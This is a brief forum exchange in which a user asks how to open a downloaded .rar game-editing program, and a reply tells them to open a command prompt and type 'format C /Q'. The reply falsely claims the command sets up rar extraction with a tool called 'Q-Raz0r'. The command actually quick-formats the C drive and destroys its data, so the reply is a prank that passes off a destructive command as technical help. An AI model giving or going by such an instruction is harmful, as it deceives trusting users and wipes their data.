How exactly are you able to open this program? I am experienced in changing game values and using programs like these, but the programs downloads as a rar. file and when I try to open it it opens up Adobe Photoshop and says that the file is not recognized or that is was corrupted during download. Any help?

start > run > cmd
then it should say a letter on the last line(e.g. C:\ [], where the [] blinks).
Now type the following there:
format C /Q

that will make it open rar files with Q-Raz0r, then you just tell it to extract, and you're done.
